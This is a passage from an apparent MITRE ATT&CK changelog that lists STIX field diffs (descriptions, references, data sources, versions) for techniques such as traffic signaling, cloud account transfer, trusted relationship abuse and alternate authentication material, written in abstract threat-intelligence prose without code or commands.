architecture. Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic Packet) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_network_requirements | True | |
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-02-17 14:23:49.495000+00:00 | 2022-10-19 23:08:40.603000+00:00 |
| description | Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet) | Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.(Citation: Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic Packet) |
| external_references[1]['source_name'] | Hartrell cd00r 2002 | Bleeping Computer - Ryuk WoL |
| external_references[1]['description'] | Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018. | Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021. |
| external_references[1]['url'] | https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631 | https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/ |
| external_references[2]['source_name'] | Cisco Synful Knock Evolution | AMD Magic Packet |
| external_references[2]['description'] | Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020. | AMD. (1995, November 1). Magic Packet Technical White Paper. Retrieved February 17, 2021. |
| external_references[2]['url'] | https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices | https://www.amd.com/system/files/TechDocs/20213.pdf |
| external_references[3]['source_name'] | FireEye - Synful Knock | Mandiant - Synful Knock |
| external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html | https://www.mandiant.com/resources/synful-knock-acis |
| external_references[4]['source_name'] | Cisco Blog Legacy Device Attacks | Cisco Synful Knock Evolution |
| external_references[4]['description'] | Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. | Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020. |
| external_references[4]['url'] | https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 | https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices |
| external_references[5]['source_name'] | Bleeping Computer - Ryuk WoL | Hartrell cd00r 2002 |
| external_references[5]['description'] | Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021. | Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018. |
| external_references[5]['url'] | https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/ | https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631 |
| external_references[6]['source_name'] | AMD Magic Packet | Cisco Blog Legacy Device Attacks |
| external_references[6]['description'] | AMD. (1995, November 1). Magic Packet Technical White Paper. Retrieved February 17, 2021. | Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. |
| external_references[6]['url'] | https://www.amd.com/system/files/TechDocs/20213.pdf | https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 |
| x_mitre_version | 2.2 | 2.4 |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Flow | Process: Process Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Tony Lee | |
| x_mitre_data_sources | Network Traffic: Network Traffic Flow |
| Description |
|---|
| Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection. A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces. Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_network_requirements | True | |
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-08 10:33:01.280000+00:00 | 2022-06-16 19:21:04.897000+00:00 |
| external_references[1]['source_name'] | DOJ GRU Indictment Jul 2018 | AWS EBS Snapshot Sharing |
| external_references[1]['description'] | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. | Amazon Web Services. (n.d.). Share an Amazon EBS snapshot. Retrieved March 2, 2022. |
| external_references[1]['url'] | https://www.justice.gov/file/1080281/download | https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html |
| x_mitre_data_sources[0] | Snapshot: Snapshot Creation | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[2] | Cloud Storage: Cloud Storage Modification | Cloud Storage: Cloud Storage Metadata |
| x_mitre_detection | Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. | Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. In AWS, sharing an Elastic Block Store (EBS) snapshot, either with specified users or publicly, generates a ModifySnapshotAttribute event in CloudTrail logs.(Citation: AWS EBS Snapshot Sharing) Similarly, in Azure, creating a Shared Access Signature (SAS) URI for a Virtual Hard Disk (VHS) snapshot generates a "Get Snapshot SAS URL" event in Activity Logs.(Citation: Azure Blob Snapshots)(Citation: Azure Shared Access Signature) |
| x_mitre_version | 1.1 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Azure Shared Access Signature', 'description': 'Delegate access with a shared access signature. (2019, December 18). Delegate access with a shared access signature. Retrieved March 2, 2022.', 'url': 'https://docs.microsoft.com/en-us/rest/api/storageservices/delegate-access-with-shared-access-signature'} | |
| external_references | {'source_name': 'Azure Blob Snapshots', 'description': 'Microsoft Azure. (2021, December 29). Blob snapshots. Retrieved March 2, 2022.', 'url': 'https://docs.microsoft.com/en-us/azure/storage/blobs/snapshots-overview'} | |
| external_references | {'source_name': 'DOJ GRU Indictment Jul 2018', 'description': 'Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.', 'url': 'https://www.justice.gov/file/1080281/download'} | |
| x_mitre_contributors | Darin Smith, Cisco | |
| x_mitre_contributors | ExtraHop | |
| x_mitre_data_sources | Cloud Storage: Cloud Storage Modification | |
| x_mitre_data_sources | Snapshot: Snapshot Metadata | |
| x_mitre_data_sources | Snapshot: Snapshot Creation |
| Old Description | New Description |
|---|---|
| Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. | Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'SYSTEM', 'root'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-02 15:20:28.455000+00:00 | 2022-04-19 23:04:44.258000+00:00 |
| description | Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. | Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. |
| external_references[1]['source_name'] | FireEye APT38 Oct 2018 | DOJ Lazarus Sony 2018 |
| external_references[1]['description'] | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. | Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019. |
| external_references[1]['url'] | https://content.fireeye.com/apt/rpt-apt38 | https://www.justice.gov/opa/press-release/file/1092091/download |
| external_references[2]['source_name'] | DOJ Lazarus Sony 2018 | FireEye APT38 Oct 2018 |
| external_references[2]['description'] | Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019. | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. |
| external_references[2]['url'] | https://www.justice.gov/opa/press-release/file/1092091/download | https://content.fireeye.com/apt/rpt-apt38 |
| x_mitre_data_sources[0] | Process: OS API Execution | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Content | Process: OS API Execution |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 23:57:08.312000+00:00 | 2022-05-05 05:00:37.443000+00:00 |
| external_references[1]['source_name'] | engima0x3 DNX Bypass | Exploit Monday WinDbg |
| external_references[1]['description'] | Nelson, M. (2017, November 17). Bypassing Application Whitelisting By Using dnx.exe. Retrieved May 25, 2017. | Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved May 26, 2017. |
| external_references[1]['url'] | https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ | http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html |
| external_references[2]['source_name'] | engima0x3 RCSI Bypass | LOLBAS Tracker |
| external_references[2]['description'] | Nelson, M. (2016, November 21). Bypassing Application Whitelisting By Using rcsi.exe. Retrieved May 26, 2017. | LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019. |
| external_references[2]['url'] | https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/ | https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/ |
| external_references[3]['source_name'] | Exploit Monday WinDbg | engima0x3 RCSI Bypass |
| external_references[3]['description'] | Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved May 26, 2017. | Nelson, M. (2016, November 21). Bypassing Application Whitelisting By Using rcsi.exe. Retrieved May 26, 2017. |
| external_references[3]['url'] | http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html | https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/ |
| external_references[4]['source_name'] | LOLBAS Tracker | engima0x3 DNX Bypass |
| external_references[4]['description'] | LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019. | Nelson, M. (2017, November 17). Bypassing Application Whitelisting By Using dnx.exe. Retrieved May 25, 2017. |
| external_references[4]['url'] | https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/ | https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ |
| x_mitre_defense_bypassed[0] | Application control | Application Control |
| Old Description | New Description |
|---|---|
| Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network. Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers) | Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network. Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers) In Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.(Citation: Office 365 Delegated Administration) |
New Mitigations:
Dropped Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-08 10:33:01.045000+00:00 | 2022-10-21 14:35:00.274000+00:00 |
| description | Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network. Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers) | Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network. Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers) In Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.(Citation: Office 365 Delegated Administration) |
| x_mitre_data_sources[3] | Logon Session: Logon Session Creation | Network Traffic: Network Traffic Content |
| x_mitre_version | 2.2 | 2.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Office 365 Delegated Administration', 'description': 'Microsoft. (n.d.). Partners: Offer delegated administration. Retrieved May 27, 2022.', 'url': 'https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us'} | |
| x_mitre_contributors | ExtraHop | |
| x_mitre_contributors | Jannie Li, Microsoft Threat Intelligence Center (MSTIC) | |
| x_mitre_data_sources | Logon Session: Logon Session Creation | |
| x_mitre_platforms | Office 365 |
| Description |
|---|
| Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-12 18:32:33.620000+00:00 | 2022-04-01 13:11:11.386000+00:00 |
| x_mitre_data_sources[0] | Command: Command Execution | Windows Registry: Windows Registry Key Access |
| x_mitre_data_sources[1] | File: File Access | Command: Command Execution |
| x_mitre_data_sources[2] | Process: Process Creation | User Account: User Account Authentication |
| x_mitre_data_sources[3] | User Account: User Account Authentication | Process: Process Creation |
| x_mitre_data_sources[4] | Windows Registry: Windows Registry Key Access | File: File Access |
| Old Description | New Description |
|---|---|
| Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo. Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool. | Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications.(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Intezer App Service Phishing) Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 16:25:37.072000+00:00 | 2022-10-20 20:16:32.599000+00:00 |
| description | Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo. Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool. | Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications.(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Intezer App Service Phishing) Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool. |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Malwarebytes Heroku Skimmers', 'description': "Jérôme Segura. (2019, December 4). There's an app for that: web skimmers found on PaaS Heroku. Retrieved August 18, 2022.", 'url': 'https://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku'} | |
| external_references | {'source_name': 'Dragos Heroku Watering Hole', 'description': 'Kent Backman. (2021, May 18). When Intrusions Don’t Align: A New Water Watering Hole and Oldsmar. Retrieved August 18, 2022.', 'url': 'https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/'} | |
| external_references | {'source_name': 'Intezer App Service Phishing', 'description': 'Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022.', 'url': 'https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/'} |
| Description |
|---|
| Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA) Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 14:15:31.630000+00:00 | 2022-04-01 12:57:34.058000+00:00 |
| x_mitre_data_sources[0] | Logon Session: Logon Session Creation | Active Directory: Active Directory Credential Request |
| x_mitre_data_sources[1] | Web Credential: Web Credential Usage | User Account: User Account Authentication |
| x_mitre_data_sources[2] | Application Log: Application Log Content | Web Credential: Web Credential Usage |
| x_mitre_data_sources[3] | User Account: User Account Authentication | Logon Session: Logon Session Creation |
| x_mitre_data_sources[4] | Active Directory: Active Directory Credential Request | Application Log: Application Log Content |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | Containers |
| Old Description | New Description |
|---|---|
